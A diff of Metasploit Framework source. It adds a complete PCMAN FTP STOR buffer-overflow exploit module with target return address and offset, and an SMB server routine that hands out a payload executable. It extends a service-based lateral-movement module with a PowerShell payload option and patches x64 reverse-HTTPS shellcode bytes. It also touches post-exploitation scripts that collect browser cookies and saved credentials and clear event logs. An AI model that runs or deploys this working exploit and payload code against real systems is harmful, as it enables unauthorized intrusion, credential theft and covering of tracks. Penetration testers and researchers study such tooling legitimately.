+  def smb_cmd_create(c, buff)
+    pkt = CONST::SMB_CREATE_PKT.make_struct
+    pkt.from_s(buff)
+
+    if pkt['Payload'].v['Payload'] =~ /#{Rex::Text.to_unicode("#{@scr_file}\x00")}/
+      pkt = CONST::SMB_CREATE_RES_PKT.make_struct
+      smb_set_defaults(c, pkt)
+      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX
+      pkt['Payload']['SMB'].v['Flags1'] = 0x88
+      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
+      pkt['Payload']['SMB'].v['WordCount'] = 42
+      pkt['Payload'].v['AndX'] = 0xff # no further commands
+      pkt['Payload'].v['OpLock'] = 0x2
+      # No need to track fid here, we're just offering one file
+      pkt['Payload'].v['FileID'] = rand(0x7fff) + 1 # To avoid fid = 0
+      pkt['Payload'].v['Action'] = 0x1 # The file existed and was opened
+      pkt['Payload'].v['CreateTimeLow'] = @lo
+      pkt['Payload'].v['CreateTimeHigh'] = @hi
+      pkt['Payload'].v['AccessTimeLow'] = @lo
+      pkt['Payload'].v['AccessTimeHigh'] = @hi
+      pkt['Payload'].v['WriteTimeLow'] = @lo
+      pkt['Payload'].v['WriteTimeHigh'] = @hi
+      pkt['Payload'].v['ChangeTimeLow'] = @lo
+      pkt['Payload'].v['ChangeTimeHigh'] = @hi
+      pkt['Payload'].v['Attributes'] = 0x80 # Ordinary file
+      pkt['Payload'].v['AllocLow'] = 0x100000
+      pkt['Payload'].v['AllocHigh'] = 0
+      pkt['Payload'].v['EOFLow'] = @exe.length
+      pkt['Payload'].v['EOFHigh'] = 0
+      pkt['Payload'].v['FileType'] = 0
+      pkt['Payload'].v['IPCState'] = 0x7
+      pkt['Payload'].v['IsDirectory'] = 0
+      c.put(pkt.to_s)
+    else
+      pkt = CONST::SMB_CREATE_RES_PKT.make_struct
+      smb_set_defaults(c, pkt)
+      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX
+      pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 # OBJECT_NAME_NOT_FOUND
+      pkt['Payload']['SMB'].v['Flags1'] = 0x88
+      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
+      c.put(pkt.to_s)
+    end
+
+  end
+
+  def smb_cmd_read(c, buff)
+    pkt = CONST::SMB_READ_PKT.make_struct
+    pkt.from_s(buff)
+
+    offset = pkt['Payload'].v['Offset']
+    length = pkt['Payload'].v['MaxCountLow']
+
+    pkt = CONST::SMB_READ_RES_PKT.make_struct
+    smb_set_defaults(c, pkt)
+
+    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_READ_ANDX
+    pkt['Payload']['SMB'].v['Flags1'] = 0x88
+    pkt['Payload']['SMB'].v['Flags2'] = 0xc001
+    pkt['Payload']['SMB'].v['WordCount'] = 12
+    pkt['Payload'].v['AndX'] = 0xff # no more commands
+    pkt['Payload'].v['Remaining'] = 0xffff
+    pkt['Payload'].v['DataLenLow'] = length
+    pkt['Payload'].v['DataOffset'] = 59
+    pkt['Payload'].v['DataLenHigh'] = 0
+    pkt['Payload'].v['Reserved3'] = 0
+    pkt['Payload'].v['Reserved4'] = 6
+    pkt['Payload'].v['ByteCount'] = length
+    pkt['Payload'].v['Payload'] = @exe[offset, length]
+
+    c.put(pkt.to_s)
+  end
+
+  def smb_cmd_trans(c, buff)
+    pkt = CONST::SMB_TRANS2_PKT.make_struct
+    pkt.from_s(buff)
+
+    sub_command = pkt['Payload'].v['SetupData'].unpack("v").first
+    case sub_command
+      when 0x5 # QUERY_PATH_INFO
+        smb_cmd_trans_query_path_info(c, buff)
+      when 0x1 # FIND_FIRST2
+        smb_cmd_trans_find_first2(c, buff)
+      else
+        pkt = CONST::SMB_TRANS_RES_PKT.make_struct
+        smb_set_defaults(c, pkt)
+        pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
+        pkt['Payload']['SMB'].v['Flags1'] = 0x88
+        pkt['Payload']['SMB'].v['Flags2'] = 0xc001
+        pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000225 # NT_STATUS_NOT_FOUND
+        c.put(pkt.to_s)
+    end
+  end
+
+  def smb_cmd_trans_query_path_info(c, buff)
+    pkt = CONST::SMB_TRANS2_PKT.make_struct
+    pkt.from_s(buff)
+
+    if pkt['Payload'].v['SetupData'].length < 16
+      # if QUERY_PATH_INFO_PARAMETERS doesn't include a file name,
+      # return a Directory answer
+      pkt = CONST::SMB_TRANS_RES_PKT.make_struct
+      smb_set_defaults(c, pkt)
+
+      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
+      pkt['Payload']['SMB'].v['Flags1'] = 0x88
+      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
+      pkt['Payload']['SMB'].v['WordCount'] = 10
+      pkt['Payload'].v['ParamCountTotal'] = 2
+      pkt['Payload'].v['DataCountTotal'] = 40
+      pkt['Payload'].v['ParamCount'] = 2
+      pkt['Payload'].v['ParamOffset'] = 56
+      pkt['Payload'].v['DataCount'] = 40
+      pkt['Payload'].v['DataOffset'] = 60
+      pkt['Payload'].v['Payload'] =
+        "\x00" + # Padding
+        # QUERY_PATH_INFO Parameters
+        "\x00\x00" + # EA Error Offset
+        "\x00\x00" + # Padding
+        #QUERY_PATH_INFO Data
+        [@lo, @hi].pack("VV") + # Created
+        [@lo, @hi].pack("VV") + # Last Access
+        [@lo, @hi].pack("VV") + # Last Write
+        [@lo, @hi].pack("VV") + # Change
+        "\x10\x00\x00\x00" + # File attributes => directory
+        "\x00\x00\x00\x00" # Unknown
+      c.put(pkt.to_s)
+
+    else
+      # if QUERY_PATH_INFO_PARAMETERS includes a file name,
+      # returns an object name not found error
+      pkt = CONST::SMB_TRANS_RES_PKT.make_struct
+      smb_set_defaults(c, pkt)
+
+      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
+      pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 #OBJECT_NAME_NOT_FOUND
+      pkt['Payload']['SMB'].v['Flags1'] = 0x88
+      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
+      c.put(pkt.to_s)
+
+    end
+  end
+
+  def smb_cmd_trans_find_first2(c, buff)
+
+    pkt = CONST::SMB_TRANS_RES_PKT.make_struct
+    smb_set_defaults(c, pkt)
+
+    file_name = Rex::Text.to_unicode(@scr_file)
+
+    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
+    pkt['Payload']['SMB'].v['Flags1'] = 0x88
+    pkt['Payload']['SMB'].v['Flags2'] = 0xc001
+    pkt['Payload']['SMB'].v['WordCount'] = 10
+    pkt['Payload'].v['ParamCountTotal'] = 10
+    pkt['Payload'].v['DataCountTotal'] = 94 + file_name.length
+    pkt['Payload'].v['ParamCount'] = 10
+    pkt['Payload'].v['ParamOffset'] = 56
+    pkt['Payload'].v['DataCount'] = 94 + file_name.length
+    pkt['Payload'].v['DataOffset'] = 68
+    pkt['Payload'].v['Payload'] =
+      "\x00" + # Padding
+      # FIND_FIRST2 Parameters
+      "\xfd\xff" + # Search ID
+      "\x01\x00" + # Search count
+      "\x01\x00" + # End Of Search
+      "\x00\x00" + # EA Error Offset
+      "\x00\x00" + # Last Name Offset
+      "\x00\x00" + # Padding
+      #QUERY_PATH_INFO Data
+      [94 + file_name.length].pack("V") + # Next Entry Offset
+      "\x00\x00\x00\x00" + # File Index
+      [@lo, @hi].pack("VV") + # Created
+      [@lo, @hi].pack("VV") + # Last Access
+      [@lo, @hi].pack("VV") + # Last Write
+      [@lo, @hi].pack("VV") + # Change
+      [@exe.length].pack("V") + "\x00\x00\x00\x00" + # End Of File
+      "\x00\x00\x10\x00\x00\x00\x00\x00" + # Allocation size
+      "\x80\x00\x00\x00" + # File attributes => directory
+      [file_name.length].pack("V") + # File name len
+      "\x00\x00\x00\x00" + # EA List Lenght
+      "\x00" + # Short file lenght
+      "\x00" + # Reserved
+      ("\x00" * 24) +
+      file_name
+
+    c.put(pkt.to_s)
+  end
+
+end
+
@@ -0,0 +1,97 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow vulnerability found in the STOR command of the
+          PCMAN FTP v2.07 Server when the "/../" parameters are also sent to the server. Please
+          note authentication is required in order to trigger the vulnerability. The overflowing
+          string will also be seen on the FTP server log console.
+      },
+      'Author'         =>
+          [
+            'Christian (Polunchis) Ramirez', # Initial Discovery
+            'Rick (nanotechz9l) Flores'      # Metasploit Module
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'OSVDB', '94624'],
+          [ 'EDB',   '27703']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+          'VERBOSE'  => true
+        },
+      'Payload'        =>
+        {
+          'Space'   => 1000,
+          'BadChars'  => "\x00\xff\x0a\x0d\x20\x40",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
+              'Offset' => 2011
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Jun 27 2013',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    c = connect_login
+    disconnect
+
+    if c and banner =~ /220 PCMan's FTP Server 2\.0/
+      # Auth is required to exploit
+      print_status("Able to authenticate, and banner shows the vulnerable version")
+      return Exploit::CheckCode::Vulnerable
+    elsif not c and banner =~ /220 PCMan's FTP Server 2\.0/
+      print_status("Unable to authenticate, but banner shows the vulnerable version")
+      # Auth failed, but based on version maybe the target is vulnerable
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+
+  def exploit
+    c = connect_login
+
+    # Auth failed. The mixin should show the error, so we just bail.
+    return unless c
+
+    # Username is part of the overflowing string, so we need to account for that length
+    user_length = datastore['FTPUSER'].to_s.length
+
+    print_status("Trying victim #{target.name}...")
+    sploit = rand_text_alpha(target['Offset'] - user_length)
+    sploit << [target.ret].pack('V')
+    sploit << make_nops(4)
+    sploit << payload.encoded
+    sploit << rand_text_alpha(sploit.length)
+
+    send_cmd( ["STOR", "/../" + sploit], false )
+    disconnect
+  end
+
+end
@@ -10,6 +10,7 @@ require 'rex'
 require 'msf/core/post/windows/services'
 require 'msf/core/post/common'
 require 'msf/core/post/file'
+require 'msf/core/exploit/powershell'
 require 'msf/core/exploit/exe'

 class Metasploit3 < Msf::Exploit::Local
@@ -18,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Local
  include Post::Common
  include Post::Windows::Services
  include Exploit::EXE
+  include Exploit::Powershell
  include Post::File

  def initialize(info={})
@@ -44,6 +46,10 @@ class Metasploit3 < Msf::Exploit::Local
            [ 'OSVDB', '3106'],
            [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
          ],
+        'DefaultOptions' =>
+            {
+                'WfsDelay'     => 10,
+            },
        'DisclosureDate' => 'Jan 01 1999',
        'Platform'      => [ 'win' ],
        'SessionTypes'  => [ 'meterpreter' ],
@@ -59,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Local
        ]),
      OptString.new("NAME",     [ false, "Service name on each target in RHOSTS (Default: random)" ]),
      OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
+      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'SMB', ['PSH', 'SMB'] ]),
      OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
    ])
  end
@@ -66,36 +73,39 @@ class Metasploit3 < Msf::Exploit::Local
  def exploit
    name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
    display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)
+    if datastore['TECHNIQUE'] == 'SMB'
+      # XXX Find the domain controller

-    # XXX Find the domain controller
+      #share_host = datastore["INTERNAL_ADDRESS"] || detect_address
+      share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
+      print_status "Using #{share_host} as the internal address for victims to get the payload from"

-    #share_host = datastore["INTERNAL_ADDRESS"] || detect_address
-    share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
-    print_status "Using #{share_host} as the internal address for victims to get the payload from"
+      # Build a random name for the share and directory
+      share_name = Rex::Text.rand_text_alphanumeric(8)
+      drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
+      share_dir = "#{drive}\\#{share_name}"

-    # Build a random name for the share and directory
-    share_name = Rex::Text.rand_text_alphanumeric(8)
-    drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
-    share_dir = "#{drive}\\#{share_name}"
+      # Create them
+      print_status("Creating share #{share_dir}")
+      session.fs.dir.mkdir(share_dir)
+      cmd_exec("net share #{share_name}=#{share_dir}")

-    # Create them
-    print_status("Creating share #{share_dir}")
-    session.fs.dir.mkdir(share_dir)
-    cmd_exec("net share #{share_name}=#{share_dir}")
+      # Generate an executable from the shellcode and drop it in the share
+      # directory
+      filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
+      payload_exe = generate_payload_exe_service(
+        :servicename => name,
+        # XXX Ghetto
+        :arch => payload.send(:pinst).arch.first
+      )

-    # Generate an executable from the shellcode and drop it in the share
-    # directory
-    filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
-    payload_exe = generate_payload_exe_service(
-      :servicename => name,
-      # XXX Ghetto
-      :arch => payload.send(:pinst).arch.first
-    )
+      print_status("Dropping payload #{filename}")
+      write_file("#{share_dir}\\#{filename}", payload_exe)

-    print_status("Dropping payload #{filename}")
-    write_file("#{share_dir}\\#{filename}", payload_exe)
-
-    service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
+      service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
+    else
+      service_executable = cmd_psh_payload(payload.encoded)
+    end

    begin
      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
@@ -113,7 +123,10 @@ class Metasploit3 < Msf::Exploit::Local

          print_status("#{server.ljust(16)} Deleting the service")
          service_delete(name, server)
-        rescue
+        rescue Rex::TimeoutError
+          vprint_status("#{server.ljust(16)} Timed out...")
+          next
+        rescue RuntimeError, ::Rex::Post::Meterpreter::RequestError
          print_error("Exception running payload: #{$!.class} : #{$!}")
          print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!")
          print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
@@ -121,10 +134,12 @@ class Metasploit3 < Msf::Exploit::Local
        end
      end
    ensure
-      print_status("Deleting share #{share_name}")
-      cmd_exec("net share #{share_name} /delete /y")
-      print_status("Deleting files #{share_dir}")
-      cmd_exec("cmd /c rmdir /q /s #{share_dir}")
+      if datastore['TECHNIQUE'] == 'SMB'
+        print_status("Deleting share #{share_name}")
+        cmd_exec("net share #{share_name} /delete /y")
+        print_status("Deleting files #{share_dir}")
+        cmd_exec("cmd /c rmdir /q /s #{share_dir}")
+      end
    end

  end
@@ -21,20 +21,21 @@ module Metasploit3
      'Description'   => 'Tunnel communication over HTTP using SSL (Windows x64)',
      'Author'        => [
        'hdm', # original 32-bit implementation
-        'agix' # x64 rewrite
+        'agix', # x64 rewrite
+        'rwincey' # x64 alignment fix
      ],
      'License'       => MSF_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X86_64,
      'Handler'       => Msf::Handler::ReverseHttps,
      'Convention'    => 'sockrdi https',
-      'Stager'        =>
+      'Stager' =>
        {
          'Offsets' =>
            {
              # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
              # 'EXITFUNC' => [ 290, 'V' ],
-              'LPORT'    => [ 282, 'v' ], # Not a typo, really little endian
+              'LPORT' => [286, 'v'], # Not a typo, really little endian
            },
          'Payload' =>
            "\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
@@ -50,21 +51,34 @@ module Metasploit3
            "\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" +
            "\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" +
            "\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" +
-            "\xFF\xFF\x5D\x49\xBE\x77\x69\x6E\x69\x6E\x65\x74\x00\x41\x56\x49" +
+            "\xFF\xFF\x5D" +
+            "\x6A\x00" + #alignment
+            "\x49\xBE\x77\x69\x6E\x69\x6E\x65\x74\x00\x41\x56\x49" +
            "\x89\xE6\x4C\x89\xF1\x49\xBA\x4C\x77\x26\x07\x00\x00\x00\x00\xFF" +
-            "\xD5\x6A\x00\x48\x89\xE1\x48\x31\xD2\x4D\x31\xC0\x4D\x31\xC9\x41" +
-            "\x50\x41\x50\x49\xBA\x3A\x56\x79\xA7\x00\x00\x00\x00\xFF\xD5\xE9" +
-            "\x9B\x00\x00\x00\x5A\x48\x89\xC1\x49\xB8\x5C\x11\x00\x00\x00\x00" +
+            "\xD5" +
+            "\x6A\x00" + #alignment
+            "\x6A\x00\x48\x89\xE1\x48\x31\xD2\x4D\x31\xC0\x4D\x31\xC9\x41" +
+            "\x50\x41\x50\x49\xBA\x3A\x56\x79\xA7\x00\x00\x00\x00\xFF\xD5" +
+            "\xE9\x9E\x00\x00\x00" + #updated jump offset
+            "\x5A\x48\x89\xC1\x49\xB8\x5C\x11\x00\x00\x00\x00" +
            "\x00\x00\x4D\x31\xC9\x41\x51\x41\x51\x6A\x03\x41\x51\x49\xBA\x57" +
-            "\x89\x9F\xC6\x00\x00\x00\x00\xFF\xD5\xEB\x79\x48\x89\xC1\x48\x31" +
+            "\x89\x9F\xC6\x00\x00\x00\x00\xFF\xD5" +
+            "\xEB\x7C" + #updated jump offset
+            "\x48\x89\xC1\x48\x31" +
            "\xD2\x41\x58\x4D\x31\xC9\x52\x68\x00\x32\xA0\x84\x52\x52\x49\xBA" +
            "\xEB\x55\x2E\x3B\x00\x00\x00\x00\xFF\xD5\x48\x89\xC6\x6A\x0A\x5F" +
-            "\x48\x89\xF1\x48\xBA\x1F\x00\x00\x00\x00\x00\x00\x00\x68\x80\x33" +
+            "\x48\x89\xF1\x48\xBA\x1F\x00\x00\x00\x00\x00\x00\x00" +
+            "\x6A\x00" + #alignment
+            "\x68\x80\x33" +
            "\x00\x00\x49\x89\xE0\x49\xB9\x04\x00\x00\x00\x00\x00\x00\x00\x49" +
            "\xBA\x75\x46\x9E\x86\x00\x00\x00\x00\xFF\xD5\x48\x89\xF1\x48\x31" +
-            "\xD2\x4D\x31\xC0\x4D\x31\xC9\x52\x49\xBA\x2D\x06\x18\x7B\x00\x00" +
-            "\x00\x00\xFF\xD5\x85\xC0\x75\x24\x48\xFF\xCF\x74\x13\xEB\xB1\xE9" +
-            "\x81\x00\x00\x00\xE8\x82\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00" +
+            "\xD2\x4D\x31\xC0\x4D\x31\xC9" +
+            "\x52\x52" + #updated alignment (extra push edx)
+            "\x49\xBA\x2D\x06\x18\x7B\x00\x00" +
+            "\x00\x00\xFF\xD5\x85\xC0\x75\x24\x48\xFF\xCF\x74\x13\xEB\xB1" +
+            "\xE9\x81\x00\x00\x00"+
+            "\xE8\x7F\xFF\xFF\xFF" + #updated jump offset
+            "\x2F\x31\x32\x33\x34\x35\x00" +
            "\x49\xBE\xF0\xB5\xA2\x56\x00\x00\x00\x00\xFF\xD5\x48\x31\xC9\x48" +
            "\xBA\x00\x00\x40\x00\x00\x00\x00\x00\x49\xB8\x00\x10\x00\x00\x00" +
            "\x00\x00\x00\x49\xB9\x40\x00\x00\x00\x00\x00\x00\x00\x49\xBA\x58" +
@@ -72,9 +86,10 @@ module Metasploit3
            "\x48\x89\xF1\x48\x89\xDA\x49\xB8\x00\x20\x00\x00\x00\x00\x00\x00" +
            "\x49\x89\xF9\x49\xBA\x12\x96\x89\xE2\x00\x00\x00\x00\xFF\xD5\x48" +
            "\x83\xC4\x20\x85\xC0\x74\x99\x48\x8B\x07\x48\x01\xC3\x48\x85\xC0" +
-            "\x75\xCE\x58\x58\xC3\xE8\xDA\xFE\xFF\xFF"
+            "\x75\xCE\x58\x58\xC3" +
+            "\xE8\xD7\xFE\xFF\xFF" #updated jump offset
        }
-      ))
+    ))
  end

  #
@@ -41,7 +41,7 @@ module Metasploit3
  end

  def library_path
-    File.join(Msf::Config.install_root, "data", "meterpreter", "metsrv.dll")
+    File.join(Msf::Config.data_directory, "meterpreter", "metsrv.x86.dll")
  end

 end
@@ -43,7 +43,7 @@ module Metasploit3
  end

  def library_path
-    File.join(Msf::Config.install_root, "data", "meterpreter", "metsrv.dll")
+    File.join(Msf::Config.data_directory, "meterpreter", "metsrv.x86.dll")
  end

 end
@@ -36,7 +36,7 @@ module Metasploit3
  end

  def library_path
-    File.join( Msf::Config.install_root, "data", "meterpreter", "metsrv.x64.dll" )
+    File.join( Msf::Config.data_directory, "meterpreter", "metsrv.x64.dll" )
  end

 end
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -22,7 +20,7 @@ def enum_int
 			print_status("\t#{i.netmask}")
 			print_status()
 		end
-		
+
 	end
 end

@@ -1,6 +1,3 @@
-# $Id$
-# $Revision$
-
 #
 # Meterpreter script for setting up a route from within a
 # Meterpreter session, without having to background the
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Meterpreter script for detecting if target host is a Virtual Machine
 # Provided by Carlos Perez at carlos_perez[at]darkoperator.com
 # Version: 0.2.0
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # credcollect - tebo[at]attackresearch.com

 opts = Rex::Parser::Arguments.new(
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 #Options and Option Parsing
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: davehull at dph_msf@trustedsignal.com
 #-------------------------------------------------------------------------------

@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Scriptjunkie
 # Uses a meterpreter session to spawn a new meterpreter session in a different process.
 # A new process allows the session to take "risky" actions that might get the process killed by
@@ -1,5 +1,3 @@
-#$Id$
-#$Revision$
 #
 # Script to extract data from a chrome installation.
 #
@@ -1,6 +1,4 @@
 #
-# $Id: enum_firefox.rb 9770 2010-07-10 20:00:32Z darkoperator $
-# $Revision: $
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -34,7 +32,7 @@ def frfxplacesget(path,usrnm)
 		fullpath = path + '\\' + x
 		if @client.fs.file.stat(fullpath).directory?
 			frfxplacesget(fullpath,usrnm)
-		elsif fullpath =~ /(formhistory.sqlite|cookies.sqlite|places.sqlite|search.sqlite)/i	
+		elsif fullpath =~ /(formhistory.sqlite|cookies.sqlite|places.sqlite|search.sqlite)/i
 			dst = x
 			dst = @logs + ::File::Separator + usrnm + dst
 			print_status("\tDownloading Firefox Database file #{x} to '#{dst}'")
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision: 9771 $
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision: $
 #Meterpreter script for enumerating Microsoft Powershell settings.
 #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
@client = client
@@ -116,7 +114,7 @@ def enum_powershell
 			end
 		end

-		
+
 	end
 end
 if client.platform =~ /win32|win64/
@@ -1,10 +1,7 @@
-# $Id$
-# $Revision: $
 #
 # Meterpreter script for enumerating putty connections
 # Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
 #
-# $Revision$
@client = client
 #Options and Option Parsing
 opts = Rex::Parser::Arguments.new(
@@ -22,7 +19,7 @@ opts.parse(args) { |opt, idx, val|

 def hkcu_base
 	key_base = []
-	
+
 	if not is_system?
 		key_base << "HKCU"
 	else
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -76,7 +74,7 @@ if client.platform =~ /win32|64/

 	# Enumerate shares being offered
 	enum_conf_shares()
-	
+
 	if not is_system?
 		mount_history = enum_recent_mounts("HKEY_CURRENT_USER")
 		run_history = enum_run_unc("HKEY_CURRENT_USER")
@@ -1,6 +1,3 @@
-# $Id: $
-# $Revision$
-
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -102,7 +99,7 @@ def enum_viclient
 			end
 		end
 	end
-	
+
 	if not is_system?
 		recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
 		print_status("Recent VI Client Connections:")
@@ -116,7 +113,7 @@ def enum_viclient
 				ssl_key = registry_getvaldata("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
 				print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
 			end
-		
+
 		end
 	else
 		user_sid = []
@@ -283,7 +280,7 @@ def enum_vmwarewrk
 		end
 	end
 	fav_file.each_line do |l|
-	
+
 		if l =~ /config/
 			print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
 		end
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
 ################## Variable Declarations ##################
@@ -48,7 +46,7 @@ def get_log_details
 	logs_detail = Array.new

 	eventlog_list.each do |log_name|
-	
+
 		# Create a hash to store the log info in (and throw default info in)
 		log_detail = Hash.new
 		log_detail[:name] = log_name
@@ -62,11 +60,11 @@ def get_log_details
 		else
 			key = "#{key}eventlog"
 		end
-	
+
 		begin
 			unless (registry_getvaldata("#{key}\\#{log_name}","Retention") == 0) then log_detail[:retention] = "Disabled" end
 			log_detail[:size] = registry_getvaldata("#{key}\\#{log_name}","MaxSize")
-			
+
 			# Open the event log
 			eventlog = @client.sys.eventlog.open(log_name)
 			log_detail[:num_of_records] = eventlog.length
@@ -74,10 +72,10 @@ def get_log_details
 			log_detail[:num_of_records] = "Access Denied"
 		end

-		
+
 		logs_detail << log_detail
 	end
-	
+
 	return logs_detail
 end

@@ -95,13 +93,13 @@ def print_log_details
 			"Maximum Size",
 			"Records"
 		])
-		
+
 	eventlog_details = get_log_details

 	eventlog_details.each do |log_detail|
 		tbl << [log_detail[:name],log_detail[:retention],"#{log_detail[:size]}K",log_detail[:num_of_records]]
 	end
-	
+
 	print_line("\n" + tbl.to_s + "\n")
 end

@@ -135,7 +133,7 @@ def list_logs(eventlog_name,filter,filter_string,logs,local_log,sup_print)
 		print_error("Failed to Open Event Log #{eventlog_name}")
 		raise Rex::Script::Completed
 	end
-	
+
 	if local_log
 		log_file = File.join(logs, "#{eventlog_name}.csv")
 		print_good("CSV File saved to #{log_file}")
@@ -152,7 +150,7 @@ def clear_logs(log_name=nil)
 	else
 		log_names << log_name
 	end
-	
+
 	log_names.each do |name|
 		begin
 			print_status("Clearing #{name}")
@@ -163,7 +161,7 @@ def clear_logs(log_name=nil)
 			print_error("Failed to Clear #{name}, Access Denied")
 		end
 	end
-	
+
 	return log_names
 end

@@ -221,7 +219,7 @@ if local_log
 	else
 		logs = ::File.join(Msf::Config.log_directory, "scripts", 'event_manager', Rex::FileUtils.clean_path(host + filenameinfo) )
 	end
-	
+
 	::FileUtils.mkdir_p(logs)
 end

@@ -242,5 +240,5 @@ if clear_logs
 			print_status eventlog_name + ": "
 			clear_logs(eventlog_name)
 		end
-	end				
+	end
 end
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision$
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
 #-------------------------------------------------------------------------------
@client = client
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision: $
 # Meterpreter script for listing installed applications and their version.
 # Provided: carlos_perez[at]darkoperator[dot]com

@@ -54,7 +52,7 @@ opts.parse(args) { |opt, idx, val|
 		print_line "Meterpreter Script for extracting a list installed applications and their version."
 		print_line(opts.usage)
 		raise Rex::Script::Completed
-		
+
 	end
 }
 if client.platform =~ /win32|win64/
@@ -1,5 +1,3 @@
-# $Id$
-# $Revision: $
 #-------------------------------------------------------------------------------
 #Options and Option Parsing
 opts = Rex::Parser::Arguments.new(
@@ -1,7 +1,3 @@
-##
-# $Id$
-# $Revision: $
-##

 require "rexml/document"

@@ -90,7 +86,7 @@ def extract_saved_creds(path,xml_file)
 			print_status "\tUser: #{e.elements["User"].text}"
 			creds << "User: #{e.elements["User"].text}"
 		end
-		
+
 		proto = e.elements["Protocol"].text
 		if  proto == "0"
 			print_status "\tProtocol: FTP"
@@ -109,14 +105,14 @@ def extract_saved_creds(path,xml_file)
 		creds << ""

 	end
-#	
+#
 	return creds
 end
 #-------------------------------------------------------------------------------
 #Function to enumerate the users if running as SYSTEM
 def enum_users(os)
 	users = []
